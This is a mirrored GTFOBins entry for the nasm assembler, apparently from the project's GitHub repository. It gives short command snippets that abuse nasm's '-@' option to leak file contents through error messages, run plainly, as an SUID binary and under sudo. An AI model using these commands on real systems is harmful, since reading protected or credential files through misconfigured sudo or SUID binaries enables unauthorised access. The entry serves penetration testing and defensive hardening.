mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 06:49:44 +01:00
17 lines
410 B
Markdown
17 lines
410 B
Markdown
---
|
|
description: The file content is treated as command line options and disclosed throught error messages, so this is not suitable for reading arbitrary binary data.
|
|
functions:
|
|
file-read:
|
|
- code: |
|
|
LFILE=file_to_read
|
|
nasm -@ $LFILE
|
|
suid:
|
|
- code: |
|
|
LFILE=file_to_read
|
|
./nasm -@ $LFILE
|
|
sudo:
|
|
- code: |
|
|
LFILE=file_to_read
|
|
sudo nasm -@ $LFILE
|
|
---
|